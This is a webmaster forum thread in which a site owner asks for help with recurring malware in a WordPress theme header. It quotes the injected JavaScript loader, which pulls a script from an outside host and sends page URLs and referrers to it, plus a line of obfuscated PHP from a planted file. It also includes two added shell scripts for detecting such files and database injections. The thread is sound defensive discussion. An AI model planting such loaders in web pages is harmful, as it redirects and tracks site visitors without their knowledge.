Old 11-09-2016, 08:17 AM   #1
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
Scripts inserted in my WP themes header

Somehow some scripts are placed in my theme header that contain malware and redirect traffic to other sites.
I changed themes 3 times and got hosting to scan for the malware, which they did and deleted, but it happens every day. It points to different sites. Some were adult dating sites. Below is a sample.
How can I get rid of these things? It has cost me money to fix some stuff and I also lost over half of my traffic.

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"=" +b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.lengt h;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b ))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cf goid",1,1),1==getCookie("__cfgoid")&&(setCookie("_ _cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://bekcelerotomotiv.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
Old 11-09-2016, 08:42 AM   #2
Brian mike
#Alberta51
 
Brian mike's Avatar
 
Industry Role:
Join Date: Oct 2014
Location: USA Territory (Alberta)
Posts: 7,887
Quote:
Originally Posted by ravenazrael View Post
Somehow some scripts are placed in my theme header that contain malware and redirect traffic to other sites.
I changed themes 3 times and got hosting to scan for the malware, which they did and deleted, but it happens every day. It points to different sites. Some were adult dating sites. Below is a sample.
How can I get rid of these things? It has cost me money to fix some stuff and I also lost over half of my traffic.

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"=" +b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.lengt h;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b ))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cf goid",1,1),1==getCookie("__cfgoid")&&(setCookie("_ _cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://bekcelerotomotiv.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
Do you use an ad network? I mean, are you a publisher? This could be the way they get into your site.
Without accusing any company, you should look into this too.
Old 11-09-2016, 09:14 AM   #3
Fetish Gimp
Confirmed User
 
Industry Role:
Join Date: Feb 2005
Posts: 1,699
I would suggest:
  • Make sure you're running updated Wordpress installations, and that all your plugins are updated.
  • If you're running any plugins that are not from the Wordpress repository, disable them. Enable them one at a time and check to see if the malicious code comes back.
  • Check that all Wordpress users with admin privileges are ones you know should exist, and change their passwords just in case.
  • Change your FTP user/passwords.

Check out these links on making Wordpress more secure:
https://codex.wordpress.org/Hardening_WordPress
Securing WordPress: Hardening Basics | The State of Security
https://www.wordfence.com/learn/how-...rdpress-sites/
Old 11-09-2016, 09:33 AM   #4
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
Thanks. Everything started when I used an ad network's script months ago, then stopped, then cleaned the whole site, but it has been returning many, many times.

All plugins are from the WP repository. The problem is that the issue happens every day or every two days, so running without a plugin per day test may end like next year and still it may harm the website.
The 3 admins are me and the developers I had to hire to fix the issue. No one else has logged in to the site as admin in the past weeks.

Is there a way to block scripts?
Old 11-09-2016, 09:40 AM   #5
Brian mike
#Alberta51
 
Brian mike's Avatar
 
Industry Role:
Join Date: Oct 2014
Location: USA Territory (Alberta)
Posts: 7,887
Can you check your Jetpack stats and tell me if you see outbound clicks going to a URL like this: 01.wp.com etc... if anything looks similar?
Many think those are legit outbound but THEY ARE NOT. I mean we have discovered hacked files with the above URL or similar.

Also check the webmaster tools USER owner property, if anyone new has been added as owner. Been hacked this way before.
Old 11-09-2016, 11:32 AM   #6
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
Quote:
Originally Posted by Brian mike View Post
Can you check your Jetpack stats and tell me if you see outbound clicks going to a URL like this: 01.wp.com etc... if anything looks similar?
Many think those are legit outbound but THEY ARE NOT. I mean we have discovered hacked files with the above URL or similar.

Also check the webmaster tools USER owner property, if anyone new has been added as owner. Been hacked this way before.
nope, none of them show anything
Old 11-09-2016, 11:35 AM   #7
Colmike9
(>^_^)b
 
Colmike9's Avatar
 
Industry Role:
Join Date: Dec 2011
Posts: 7,223
Find out what program and with what refID they're sending traffic to, then report them to that program so that they get canned and not paid..
Old 11-09-2016, 11:38 AM   #8
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
Quote:
Originally Posted by Colmike7 View Post
Find out what program and with what refID they're sending traffic to, then report them to that program so that they get canned and not paid..
I will do that, but still that may not stop them from doing it, as they might just go to other affiliates. Is there a way to block a specific script, regardless of the URL?
Old 11-09-2016, 11:44 AM   #9
Brian mike
#Alberta51
 
Brian mike's Avatar
 
Industry Role:
Join Date: Oct 2014
Location: USA Territory (Alberta)
Posts: 7,887
Quote:
Originally Posted by ravenazrael View Post
I will do that, but still that may not stop them from doing it, as they might just go to other affiliates. Is there a way to block a specific script, regardless of the URL?
Talk to Roby https://gfy.com/business-services/122...l#post21246502

At this point if your tech can't fix it try another one mate. Or worst case change Theme.

Good Luck and keep us posted
Old 11-09-2016, 11:54 AM   #10
Colmike9
(>^_^)b
 
Colmike9's Avatar
 
Industry Role:
Join Date: Dec 2011
Posts: 7,223
Quote:
Originally Posted by ravenazrael View Post
I will do that, but still that may not stop them from doing it, as they might just go to other affiliates. Is there a way to block a specific script, regardless of the URL?
I have one way to block the script without removing it, but it's stupid so I won't post it..


Try removing the script, then change your cPanel and WP passwords, "harden" WP if you know how, remove plugins and themes that you don't use anymore, make sure file permissions are set right, see if there are any weird fake files added like jquery.min.php or .ftpquote, check uploads folder for things that don't belong, and sometimes people with this issue have resolved it with something called Sucuri.

Hope this helps.
Old 11-09-2016, 11:59 AM   #11
Brian mike
#Alberta51
 
Brian mike's Avatar
 
Industry Role:
Join Date: Oct 2014
Location: USA Territory (Alberta)
Posts: 7,887
Colmike your link is VIrusssssssssssss

DON'T CLICK THIS LINK, see below why

Old 11-09-2016, 12:04 PM   #12
Colmike9
(>^_^)b
 
Colmike9's Avatar
 
Industry Role:
Join Date: Dec 2011
Posts: 7,223
Quote:
Originally Posted by Brian mike View Post
Colmike your link is VIrusssssssssssss

DON'T CLICK THIS LINK, see below why

I removed it, but that was just sucuri.net showing the malware in plain text.
Old 11-09-2016, 01:03 PM   #13
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
ok thanks.. will let you know if something of this works out
Old 11-09-2016, 01:13 PM   #14
Google Expert
Webmaster
 
Google Expert's Avatar
 
Industry Role:
Join Date: Jun 2004
Posts: 14,294
We used to have exactly same thing. Even managed to track down the fucking russian down to his home address.

We tried EVERYTHING to get rid of it. And the only thing that worked was a complete server wipe.

They inject their code through some shitty wp plugin, and then the virus spreads everywhere on your system. Even limiting server access by IP firewall didn't help. Had to wipe/format the server.
Old 11-09-2016, 01:30 PM   #15
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
Quote:
Originally Posted by Google Expert View Post
We used to have exactly same thing. Even managed to track down the fucking russian down to his home address.

We tried EVERYTHING to get rid of it. And the only thing that worked was a complete server wipe.

They inject their code through some shitty wp plugin, and then the virus spreads everywhere on your system. Even limiting server access by IP firewall didn't help. Had to wipe/format the server.
thanks. I'll need to get someone to do that.
Old 11-09-2016, 02:09 PM   #16
Bama
Confirmed User
 
Join Date: Nov 2001
Location: Redmond, WA
Posts: 2,727
If you have downloaded a theme and it has encrypted ANYTHING on it, that is probably the source of the problem.
Old 11-09-2016, 02:13 PM   #17
Relic
So Fucking Banned
 
Join Date: Aug 2002
Posts: 10,300
That's what you get not keeping software up to date, op.
Old 11-09-2016, 02:25 PM   #18
PornAffiliate
Affiliate
 
PornAffiliate's Avatar
 
Industry Role:
Join Date: Feb 2008
Posts: 241
You probably already have tried some malware plugins - but if you haven't tried this one I would give it a go: https://wordpress.org/plugins/gotmls/
Old 11-09-2016, 08:45 PM   #19
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
Thanks guys, and thanks for the recommendations.
As I am not tech savvy and the person helping me is MIA, I tried to find the issue myself.
what is the dirs.php file supposed to do?
i think that is one of the issues. it has crap like this one
${S8TWxbKKKF("8Cw8}y27>v#")} = ${VpyOMClU(";ZC0b:wf~")}(Array(S8TWxbKKKF("2?@=") => Array(RoPOn5JDKcTm("70@5=3") => XcNWgTqO("xx}!"), HQZTMCcx4OL("20-13A") => S8TWxbKKKF("k::A3=D\\FLD:bI-=>;943G=D8XDXEFG\\8BFBU@>93=3@688"), S8TWxbKKKF("-::A3=D") => $content)));
Old 11-09-2016, 09:34 PM   #20
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
what does it mean when wordfence tells you that somebody came to your site and tried to access non existent page. the non-existent pages are not real pages...
http://www.boobsrealm.com/wp-content.../wordfence.png
Old 11-09-2016, 09:58 PM   #21
Fetish Gimp
Confirmed User
 
Industry Role:
Join Date: Feb 2005
Posts: 1,699
Quote:
Originally Posted by ravenazrael View Post
what is the dirs.php file supposed to do?
i think that is one of the issues. it has crap like this one
${S8TWxbKKKF("8Cw8}y27>v#")} = ${VpyOMClU(";ZC0b:wf~")}(Array(S8TWxbKKKF("2?@=") => Array(RoPOn5JDKcTm("70@5=3") => XcNWgTqO("xx}!"), HQZTMCcx4OL("20-13A") => S8TWxbKKKF("k::A3=D\\FLD:bI-=>;943G=D8XDXEFG\\8BFBU@>93=3@688"), S8TWxbKKKF("-::A3=D") => $content)));
Wordpress itself does not have any such file.

If you found that file on the root directory of your Wordpress install, and you're sure that all your plugins are safe, then it is highly likely access to your server has been compromised.

I would suggest trying this, in this order:
  1. Change all your server-related user/passwords (ftp/cpanel, ssh)
  2. Change all your Wordpress passwords
  3. Delete the dirs.php file you found

If the script issue persists after all that, then your problem is as serious as Google Expert's because infected files are hidden somewhere else in your server.
Old 11-09-2016, 10:36 PM   #22
Colmike9
(>^_^)b
 
Colmike9's Avatar
 
Industry Role:
Join Date: Dec 2011
Posts: 7,223
Quote:
Originally Posted by ravenazrael View Post
what does it mean when wordfence tells you that somebody came to your site and tried to access non existent page. the non-existent pages are not real pages...
http://www.boobsrealm.com/wp-content.../wordfence.png
Probably a bot checking sites for backdoors and/or other vulnerabilities..

There are others, too, like if you see a bunch of random.com/something/feed showing up then that's a bot looking for content to scrape.
Old 11-09-2016, 11:48 PM   #23
lezinterracial
Confirmed User
 
Industry Role:
Join Date: Jul 2012
Posts: 3,064
Quote:
Originally Posted by ravenazrael View Post
what does it mean when wordfence tells you that somebody came to your site and tried to access non existent page. the non-existent pages are not real pages...
http://www.boobsrealm.com/wp-content.../wordfence.png
That doesn't look malicious to me. Looks like your css in your theme is looking for a font that is in your theme that it can't find.

I would search "fonts/fontawesome-webfont.woff2 found" or "themes/redwave-lite/fonts/fontawesome-webfont.woff?version=4.3.0"

If you want to fix this error. You may want to look for your hack though.



Are you on shared hosting? Can you find when your file is getting changed? Maybe check the site log for when the hacked file is getting updated.

Did you change your ftp password like Fetish Gimp mentioned? Did you change your wordpress password?

I like to rename wp-login.php to something else and change it back only when I need to make an update. I don't think this will help you, but may be worth a try.
Old 11-10-2016, 01:56 AM   #24
jscott
So Fucking Banned
 
Industry Role:
Join Date: Feb 2001
Location: Taipei
Posts: 25,198
ravenazrael, you are in for a big surprise. This shit has been hitting my sites for months, it's no easy cleanup. Sometimes they can make your sites appear to be normal while stealing all your Google traffic too.

https://aw-snap.info/file-viewer/
I found this online website scanning tool very helpful

This is a terrible, terrible thing. Good luck getting it fixed.
Old 11-10-2016, 02:07 AM   #25
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
Thanks to everybody!
Yes it has been hitting me for months and it looked normal for a while. my traffic has gone to 1/3 now
Old 11-10-2016, 02:15 AM   #26
just a punk
So fuckin' bored
 
just a punk's Avatar
 
Industry Role:
Join Date: Jun 2003
Posts: 32,381
Quote:
Originally Posted by Bama View Post
If you have downloaded a theme and it has encrypted ANYTHING on it, that is probably the source of the problem.
According to the reports I read, over 90% of all "nulled" plugins and themes that float on the pirate sites and torrents have a backdoor.
Old 11-10-2016, 06:59 AM   #27
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
Quote:
Originally Posted by CyberSEO View Post
According to the reports I read, over 90% of all "nulled" plugins and themes that float on the pirate sites and torrents have a backdoor.
All plugins were downloaded from the WP repository... files were cleared... but the script returned again =(
Old 11-10-2016, 07:20 AM   #28
Brian mike
#Alberta51
 
Brian mike's Avatar
 
Industry Role:
Join Date: Oct 2014
Location: USA Territory (Alberta)
Posts: 7,887
Quote:
Originally Posted by ravenazrael View Post
All plugins were downloaded from the WP repository... files were cleared... but the script returned again =(
Blame Donald Trump (joke aside, trying to make you smile for 5 sec.). I feel you mate, do you think it's time to wipe out?

I have my part of problems also, moving server is a Bitch.... Hitting my head on my desk for the last 72 hours grrrrr.

At least you know where the problem comes from, I suggest you TAKE Big action to wipe it out.
Old 11-10-2016, 09:14 AM   #29
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
Quote:
Originally Posted by Brian mike View Post
Blame Donald Trump (joke aside, trying to make you smile for 5 sec.). I feel you mate, do you think it's time to wipe out?

I have my part of problems also, moving server is a Bitch.... Hitting my head on my desk for the last 72 hours grrrrr.

At least you know where the problem comes from, I suggest you TAKE Big action to wipe it out.
by wipe out you mean the whole site and content?? =(
Old 11-10-2016, 10:16 AM   #30
Fetish Gimp
Confirmed User
 
Industry Role:
Join Date: Feb 2005
Posts: 1,699
Quote:
Originally Posted by ravenazrael View Post
by wipe out you mean the whole site and content?? =(
I believe what he means is that you back-up your database and image/video files, and wipe the server clean. Change all passwords, and reinstall your backed up files.

One thing you might wanna do is to search your Wordpress database(s) for any scripts that might have been injected into it. Search for any <script> tags and strings from the script that keeps getting injected just in case they've been saved into the database so that whenever Wordpress runs, they get put back in.
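Added example, not part of the post above: one way to run the database search it describes offline, against a `mysqldump` export of the WordPress database. The function names, the sample dump rows, the allowlist and the `injected.invalid` host are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the thread). Function names are hypothetical.

# Tables whose dumped rows contain a <script tag, as "table: matching-lines".
tables_with_scripts() {        # $1 = SQL dump
    grep -i '<script' "$1" \
      | sed -n 's/^INSERT INTO `\([^`]*\)`.*/\1/p' \
      | sort | uniq -c | awk '{ print $2 ": " $1 }'
}

# Hosts that stored <script ...> tags load from, minus the hosts you expect.
unexpected_script_hosts() {    # $1 = SQL dump, $2 = allowlist, one host per line
    grep -oiE '<script[^>]*>' "$1" \
      | grep -oiE 'https?://[a-z0-9.-]+' \
      | sed 's#^[A-Za-z]*://##' | tr 'A-Z' 'a-z' | sort -u \
      | grep -vxFf "$2" || true
}

# Rows carrying the loader shape posted in this thread: document.write()
# assembling a <script> tag. Prints "dump-line-number:table".
loader_rows() {                # $1 = SQL dump
    grep -niE 'document\.write\(.*<script' "$1" \
      | sed -n 's/^\([0-9]*\):INSERT INTO `\([^`]*\)`.*/\1:\2/p'
}

# Constructed sample dump: one clean row, one expected CDN script, one injection.
make_demo_dump() {             # $1 = output file
    cat > "$1" <<'EOF'
INSERT INTO `wp_options` VALUES (1,'siteurl','http://blog.example','yes');
INSERT INTO `wp_options` VALUES (77,'widget_text','<script src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js\"></script>','yes');
INSERT INTO `wp_posts` VALUES (5,'<p>Hello</p><script>document.write(\'<script src=\"\' + \'http://injected.invalid/js/jquery.min.php\' + \'\"><\' + \'/script>\');</script>');
EOF
}

if [ -n "${1:-}" ]; then
    # Real use: $1 = dump file, $2 = optional allowlist file
    tables_with_scripts "$1"
    unexpected_script_hosts "$1" "${2:-/dev/null}"
    loader_rows "$1"
else
    # No arguments: run against the constructed sample
    tmp=$(mktemp -d)
    make_demo_dump "$tmp/dump.sql"
    printf 'ajax.googleapis.com\n' > "$tmp/allow.txt"
    tables_with_scripts "$tmp/dump.sql"
    unexpected_script_hosts "$tmp/dump.sql" "$tmp/allow.txt"
    loader_rows "$tmp/dump.sql"
    rm -rf "$tmp"
fi
```

A row that turns up here explains a script that returns after the files are cleaned, because the theme re-renders it from the database on every page load.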
Old 11-10-2016, 10:28 AM   #31
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
Quote:
Originally Posted by Fetish Gimp View Post
I believe what he means is that you back-up your database and image/video files, and wipe the server clean. Change all passwords, and reinstall your backed up files.

One thing you might wanna do is to search your Wordpress database(s) for any scripts that might have been injected into it. Search for any <script> tags and strings from the script that keeps getting injected just in case they've been saved into the database so that whenever Wordpress runs, they get put back in.
thanks. well that was done before... two months ago.. and the problem persisted
Old 11-13-2016, 05:47 PM   #32
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
seems it is finally solved. thanks to you all!
Old 11-14-2016, 12:06 AM   #33
jscott
So Fucking Banned
 
Industry Role:
Join Date: Feb 2001
Location: Taipei
Posts: 25,198
oh it's never solved
Old 11-14-2016, 02:17 AM   #34
klinton
So Fucking Banned
 
Industry Role:
Join Date: Apr 2003
Location: online
Posts: 8,766
so how did you fix it ?
Quote:
Originally Posted by ravenazrael View Post
seems it is finally solved. thanks to you all!
Old 11-14-2016, 02:22 AM   #35
PornDiscounts-V
Confirmed User
 
PornDiscounts-V's Avatar
 
Industry Role:
Join Date: Oct 2003
Location: L.A.
Posts: 5,744
They likely made many backdoor shells. Best bet is to format, then import only posts from the old database on a fresh install.
Old 11-14-2016, 09:33 PM   #36
MichaelA2014
Registered User
 
Industry Role:
Join Date: Oct 2014
Posts: 9
Back up only post content and images. nothing else. Then do a clean install. Most likely you got that code when you 'tried' one of those nulled plugins from blackhat forums or let one of those bargain freelancers work on your site.
Old 11-15-2016, 04:43 AM   #37
j3rkules
VIP
 
j3rkules's Avatar
 
Industry Role:
Join Date: Jul 2013
Posts: 22,111
Quote:
Originally Posted by klinton View Post
so how did you fix it ?
I am also curious after reading all of this.
Old 11-15-2016, 05:37 AM   #38
Google Expert
Webmaster
 
Google Expert's Avatar
 
Industry Role:
Join Date: Jun 2004
Posts: 14,294
Quote:
Originally Posted by ravenazrael View Post
All plugins were downloaded from the WP repository... files were cleared... but the script returned again =(
I already told you. The script infected all your server.

You need to format the HDD and do a clean OS install.

Other than this, nothing will help.
Old 11-15-2016, 07:11 AM   #39
Paz
Confirmed User
 
Paz's Avatar
 
Industry Role:
Join Date: Jun 2012
Posts: 457
Quote:
Originally Posted by Google Expert View Post
I already told you. The script infected all your server.

You need to format the HDD and do a clean OS install.

Other than this, nothing will help.
This isn't true. You can update plugins themes, run malware scanners and update all your passwords then install a Better Security plugin. It's a pain but much quicker than a format and clean install.
Old 11-15-2016, 07:53 AM   #40
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
Quote:
Originally Posted by Paz View Post
This isn't true. You can update plugins themes, run malware scanners and update all your passwords then install a Better Security plugin. It's a pain but much quicker than a format and clean install.
yep.. that is what worked.. so far
I actually never downloaded any plugin or script from BHW. i remember it all started when I inserted a script from a well-known ad network. Not sure if it triggered it or was coincidence
Old 11-15-2016, 04:24 PM   #41
ErectMedia
Confirmed Chicago Pimp
 
ErectMedia's Avatar
 
Industry Role:
Join Date: Aug 2004
Location: Chicago
Posts: 7,100
Basics....

https://ithemes.com/2016/10/13/how-t...ly-and-easily/

Good plugin...

https://wordpress.org/plugins/all-in...-and-firewall/

If that doesn't do it could route DNS through Incapsula to kill off some bad shit before it even gets to your server. CloudFlare more popular and a good CDN but in terms of security Incapsula's free plan blocks more bad shit out than CloudFlare's paid plan.
Old 11-15-2016, 04:56 PM   #42
Shoplifter
Richest man in Babylon
 
Shoplifter's Avatar
 
Industry Role:
Join Date: Jan 2002
Location: Posts: 10,002
Posts: 5,687
It is possible to clean out a hacked Wordpress setup and indeed I have done it.

One thing that may help you is this: find /pathtoyourfiles/yourblog.com -mtime -2 -ls

It will list all of the files that have been modified in the past two days, which is very helpful in catching backdoor shell scripts and files being placed on your server.

If the attacker is using your site to send spam emails it's easy to find the originating script from the email header. Then you can delete it and also search in your logs for other scripts being used to send email. Usually the attacker will have three systems going, one is the actual backdoor that allows him to place files on your server, the other are the scripts that they use to send spam emails, and the other is a page on your website that acts as an endpoint for the URLs in his spam emails. This is the classic attack these days and once you can wrap your head around what they are trying to do it's a lot easier to prevent it.

It can also help if you use something like wordfence which will catch some but not all of the problems. Also keep your plugins up to date and delete any old plugins and themes.
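Added example, not part of the post above or of any tool named in the thread: a shell triage pass over a WordPress docroot that generalises the `find ... -mtime -2` check and also covers the leads raised earlier in the thread (PHP files in the uploads folder, the file names `jquery.min.php`, `.ftpquote` and `dirs.php`, and content shaped like the two posted samples). The function names, the demo tree and the `example.invalid` host are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the thread). Function names are hypothetical.

# 1. Code files changed in the last N days (generalises `find ... -mtime -2 -ls`).
recent_code_files() {   # $1 = docroot, $2 = days
    find "$1" -type f -mtime "-$2" \
        \( -name '*.php' -o -name '*.js' -o -name '.htaccess' \) -print | sort
}

# 2. Executable PHP inside the uploads folder, which should hold media only.
php_in_uploads() {      # $1 = docroot
    [ -d "$1/wp-content/uploads" ] || return 0
    find "$1/wp-content/uploads" -type f \
        \( -name '*.php' -o -name '*.phtml' \) -print | sort
}

# 3. File names the thread reports as planted (leads to inspect, not proof).
planted_names() {       # $1 = docroot
    find "$1" -type f \
        \( -name 'jquery.min.php' -o -name '.ftpquote' -o -name 'dirs.php' \) -print | sort
}

# 4. Content shaped like the two samples posted in the thread:
#    a) document.write() emitting a <script> tag whose src is a .php URL
#    b) PHP variable-variables built from function calls: ${Name("...")}
content_hits() {        # $1 = docroot
    find "$1" -type f \( -name '*.php' -o -name '*.js' \) -exec grep -lE \
        -e 'document\.write\(.*<script.*\.php' \
        -e '\$\{[A-Za-z0-9_]+\("' {} + | sort
}

# Prefix each path on stdin with a reason tag and a tab.
tag() { awk -v t="$1" '{ print t "\t" $0 }'; }

# Full report: one "reason<TAB>path" line per finding.
triage() {              # $1 = docroot, $2 = days
    recent_code_files "$1" "$2" | tag "modified<${2}d"
    php_in_uploads "$1"         | tag "php-in-uploads"
    planted_names "$1"          | tag "planted-name"
    content_hits "$1"           | tag "injected-content"
}

# Number of distinct files that triggered at least one check.
flagged_count() {       # $1 = docroot, $2 = days
    triage "$1" "$2" | cut -f2- | sort -u | wc -l | tr -d ' '
}

# Constructed sample tree; every file body here is made up for the demo.
make_demo_tree() {      # $1 = empty directory
    mkdir -p "$1/wp-content/themes/demo" "$1/wp-content/uploads/2016/11"
    printf '<?php // clean core file\n' > "$1/index.php"
    touch -t 201601010000 "$1/index.php"     # old mtime, outside the window
    cat > "$1/wp-content/themes/demo/header.php" <<'EOF'
<html><head>
<script>document.write('<script src="' + 'http://example.invalid/js/jquery.min.php' + '"><' + '/script>');</script>
</head>
EOF
    cat > "$1/dirs.php" <<'EOF'
<?php ${AbCdEf("x1")} = ${GhIjKl("y2")}(Array(AbCdEf("z3") => $content));
EOF
    printf '<?php /* placeholder body */\n' > "$1/wp-content/uploads/2016/11/jquery.min.php"
    printf 'GIF89a' > "$1/wp-content/uploads/2016/11/photo.gif"
}

if [ -n "${1:-}" ]; then
    triage "$1" "${2:-2}"            # real use: docroot [days]
else
    demo=$(mktemp -d)                # no arguments: run on the constructed tree
    make_demo_tree "$demo"
    triage "$demo" 2
    rm -rf "$demo"
fi
```

Every hit is a lead to review by hand; a file that appears under several tags (recently modified, planted name and injected content at once) is the one to open first.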
Old 11-15-2016, 07:44 PM   #43
ravenazrael
Confirmed User
 
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
thank you! I hope all this also helps somebody else who may have similar issues in the future
Old 11-15-2016, 09:23 PM   #44
Google Expert
Webmaster
 
Google Expert's Avatar
 
Industry Role:
Join Date: Jun 2004
Posts: 14,294
Quote:
Originally Posted by Paz View Post
This isn't true. You can update plugins themes, run malware scanners and update all your passwords then install a Better Security plugin. It's a pain but much quicker than a format and clean install.
Do you understand that he injected the code everywhere outside the WordPress?

We had spent 6 months trying to clean it out from our server. It would always come back. In the end we had to format HD and reinstall OS.

P.S.
they also try to hide their presence by redirecting certain countries only. So you may be viewing the site and thinking that all is good, while people from other countries are being redirected to his doorway pages.